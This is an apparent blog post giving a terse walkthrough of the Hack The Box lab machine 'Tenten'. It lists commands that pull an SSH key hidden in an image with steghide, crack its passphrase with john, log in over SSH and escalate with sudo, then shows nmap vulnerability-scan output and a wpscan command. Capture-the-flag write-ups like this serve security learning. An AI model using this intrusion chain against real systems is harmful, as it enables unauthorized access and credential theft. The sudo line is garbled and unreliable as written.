Saturday, 25 August 2018

Tenten 10.10.10.10 CV filename disclosure on Job-Manager WP plugin

Commands:
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
python sshng2john.py id_rsa > id_rsa.encrypted
john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
sudo /bin/fuckin su



root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
|   Found the following possible CSRF vulnerabilities:
|   
|     Path: http://10.10.10.10:80/
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/#icon-bars
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/#icon-close
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/index.php/category/uncategorized/
|     Form id: search-form-5b8197994e6e2
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/#icon-search
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/wp-login.php
|     Form id: loginform
|     Form action: http://10.10.10.10/wp-login.php
|   
|     Path: http://10.10.10.10/index.php/jobs/
|     Form id:
|     Form action: http://10.10.10.10/index.php/jobs/apply/
|   
|     Path: http://10.10.10.10/#content
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/index.php/2017/04/
|     Form id: search-form-5b81979f27fb2
|_    Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /wp-login.php: Possible admin folder
|   /wp-login.php: Wordpress login page.
|_  /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'

Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#



wpscan -u 10.10.10.10 -f -e -r

No comments:

Post a Comment